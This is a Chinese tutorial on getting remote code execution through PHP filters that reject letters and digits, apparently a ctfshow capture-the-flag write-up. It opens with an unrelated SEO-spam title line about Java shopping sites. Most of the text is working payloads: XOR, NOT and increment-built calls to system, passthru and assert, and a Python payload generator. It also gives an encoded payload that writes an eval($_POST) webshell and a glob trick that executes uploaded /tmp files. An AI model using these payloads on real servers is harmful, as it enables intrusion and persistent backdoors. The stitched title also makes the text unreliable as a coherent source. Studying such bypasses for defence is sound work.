用java怎么做购物网站seo网页优化培训
单词字符(\w):
大小写字母 (a-z, A-Z)
数字 (0-9)
下划线 (_)
非单词字符(\W)是上面以外的任何字符,例如:
标点符号(如 !, @, #)
空格、换行符
其他非字母数字的字符
用运算符实现
1、 异或运算符
^
两个字符异或操作后,会得到一个新的字符,例如:
h和[进行异或操作,得到的结果为3
这是由于,在ascii码表中:
h: 104 0x68 01101000
[: 91 0x5B 0101101101101000和01011011逐位进行异或后,得到00110011,也就是0x33,在ascii码中表示是数字3:
<?php $a = 'h'^'[';echo $a;
?>
// 输出:3例如像以下这样构造命令:
$__=("#"^"|"); // _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
$$__[_]($$__[__]); // $_POST[_]($_POST[__]);使用时,讲上述构造的命令取消换行,并进行url编码,传入参数即可:
例如:
<?php$w = $_GET['w'];if (!preg_match("/[a-zA-Z0-9]/"), $w){eval($w);}
?>Payload可以写成:
?w=%24__%3D(%22%23%22%5E%22%7C%22)%3B%24__.%3D(%22.%22%5E%22~%22)%3B%24__.%3D(%22%2F%22%5E%22%60%22)%3B%24__.%3D(%22%7C%22%5E%22%2F%22)%3B%24__.%3D(%22%7B%22%5E%22%2F%22)%3B%24%24__%5B_%5D(%24%24__%5B__%5D)%3B&_=system&__=whoami在实际应用中,可以通过python构造出我们需要的命令的异或算式,后续使用这个脚本,只需要修改payload和正则表达式即可
import re
import urllib.parse
import requests
def generate_xor_expression(payload, filter_regex):"""根据目标 payload 和过滤正则表达式,生成异或表达式。参数:payload: 目标字符串filter_regex: 用于过滤字符的正则表达式返回:构造的异或表达式字符串"""xor_1 = ''xor_2 = ''usable_chars = []# 找到没有被过滤的可用字符for i in range(0xff):if chr(i) not in filter_regex:usable_chars.append(chr(i))# 遍历目标 payload 的每个字符,找到对应的异或字符对for k in range(len(payload)):for i in usable_chars:if chr(ord(i) ^ 127) == payload[k]: # 检查两个字符异或结果是否等于目标字符xor_1 += ixor_2 += chr(127)continue# 构建最终的表达式,将字符进行URL编码return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"# 测试函数
if __name__ == "__main__":payload = "ls" # 要生成的目标 payloadfilter_regex = r'[a-zA-Z0-9]' # 定义过滤正则表达式result = generate_xor_expression(payload, filter_regex) # 调用函数print(result) # 打印最终生成的表达式测试:<?php$c = $_GET['c'];if(!preg_match("/[A-Za-z0-9]+/", $c)) {echo 'Yes';eval($c);} else {echo 'No';}show_source(__FILE__);
?>构建payload:passthru(ls)('%0F%1E%0C%0C%0B%17%0D%0A'^'%7F%7F%7F%7F%7F%7F%7F%7F')('%13%0C'^'%7F%7F')
构建payload:passthru(ls)
('%0F%1E%0C%0C%0B%17%0D%0A'^'%7F%7F%7F%7F%7F%7F%7F%7F')('%13%0C'^'%7F%7F')
2、 或运算符
|
同上异或的原理,不过需要改一下脚本里的运算符
3、 取反
~
<?php$a = 'system';$b = ~$a;echo urlencode($b);
?>得到的结果为%8C%86%8C%8B%9A%92,此时将改数据再取反,就可以得到我们想要的system,利用方式和异或部分同理。
4、 自增
利用自增,例如
"a"++ => "b"所以,只要能够得到一个字符,我们就可以通过自增或自减的方式得到所有的字母。那么,要如何得到一个字母,例如A,在PHP中,强制连接数组和字符串的话,数组将会被转化为字符串,其值为“Array”。再取这个字符串的第一个字母,就可以得到A。
<?php
$a = ''.[];
var_dump($a);
还有其他的取字母的方法,例如:
(0/0).'' //NAN
(1/0).'' //INF参考佬的payload:
<?php
$_=[].''; //得到"Array"
$___ = $_[$__]; //得到"A",$__没有定义,默认为False也即0,此时$___="A"
$__ = $___; //$__="A"
$_ = $___; //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$___ .= $__; //$___="AS"
$___ .= $__; //$___="ASS"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++; //得到"E",此时$__="E"
$___ .= $__; //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++; //得到"R",此时$__="R"
$___ .= $__; //$___="ASSER"
$__++;$__++; //得到"T",此时$__="T"
$___ .= $__; //$___="ASSERT"
$__ = $_; //$__="A"
$____ = "_"; //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"P",此时$__="P"
$____ .= $__; //$____="_P"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"O",此时$__="O"
$____ .= $__; //$____="_PO"
$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$____ .= $__; //$____="_POS"
$__++; //得到"T",此时$__="T"
$____ .= $__; //$____="_POST"
$_ = $$____; //$_=$_POST
$___($_[_]); //ASSERT($POST[_])PHP7和PHP5中的特性
assert是无字母数字RCE中很重要的一个函数,但是php5和php7中的这个函数是有区别的。在php5中,assert是一个函数,因此我们可以动态调用。但是在PHP7中,assert不再是一个函数,而是变成了一个语言结构,不能再作为函数名动态执行代码。在php7中,可以通过($a)()这样的方式来执行命令,也就是说我们对phpinfo取反之后就可以直接执行了,亦或用file_put_contents来写shell。
php7中
例如想执行phpinfo(),可以写成(phpinfo)(),利用取反构造payload:
(~%8F%97%8F%96%91%99%90)() // phpinfo
甚至可以直接写马file_put_contents('4.php','<?php eval(\$_POST[1]);');
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4));
成功写入
php5中
在php5中,不支持用($a)()这样的语句来调用函数,因此需要考虑用一些更巧妙的技巧
这种绕过方式最主要利用到的特性:
php在处理上传的文件时,会将其保存在临时文件夹下(/tmp),并且默认的文件名为/tmp/phpXXXXXX的形式,文件名的后六位为随机的大小写字母
可以使用.来执行任意文件,即使这个文件没有执行权限
Linux下的文件可以使用通配符表示
我们在php中上传的文件,会被临时放到tmp目录下并且目录为/tmp/phpXXXXXX,但是只是放到该目录下是达不到我们的目的的,那么就需要想办法执行他。此时就想到了Linux中的.,.在执行一个文件的时候,不需要改文件具有执行权限,.代表的是当前的shell,. file也就是使用当前的shell来执行file文件。那么结合起来想一下,如果有一个可以进行rce的点,即使是过滤了字母数字的情况下,我们不就可以使用.来执行我们上传的临时文件了吗。
但是又出现问题了,本文不就是在讲无字母数字的情况如何进行rce吗,不能传入字母、数字,要怎么获取到上传的临时文件呢。我们就可以使用通配符,例如/tmp/phpXXXXXX就可以被表示为/???/?????????。
但是,当我们像这样去尝试获取php上传的临时文件时,又出现了问题,有很多能满足/???/?????????匹配格式的文件,以下引用p神的图
可以看到,这样的结构,匹配到了这么多文件,而且我们在php中上传生成的临时文件,排到了第6位,那么,在执行. /???/?????????时,就可能在前面的过程中出现问题,然后就导致整个流程终止,无法执行到我们上传的文件。
那么如何解决,仔细观察,可以发现这些列出来的文件中,只有php的临时文件中存在大写字母,并且,在glob通配符中,支持使用[^x]的方法构造表示“这个位置不是字符x”的表达式,因为^在方括号中表示非。一下继续引用p神的图,同理就可以过滤掉很多文件
那么,同理,我们可以通过表达式,去匹配出文件名中带有大写字母的文件,就是php上传文件后生成的临时文件。
可以看到,大写字母在ascii码表上是介于@和[这两个符号之间的,那么在表达式中就可以使用[@-[]来表示大写字母
. /???/????????[@-[]
那么payload就可以这么打
?><?=`. /???/????????[@-[]`;?>ctfshow web56例题参考ctfshow-web入门-命令执行(web56、web57、web58)_ctfshow web56-CSDN博客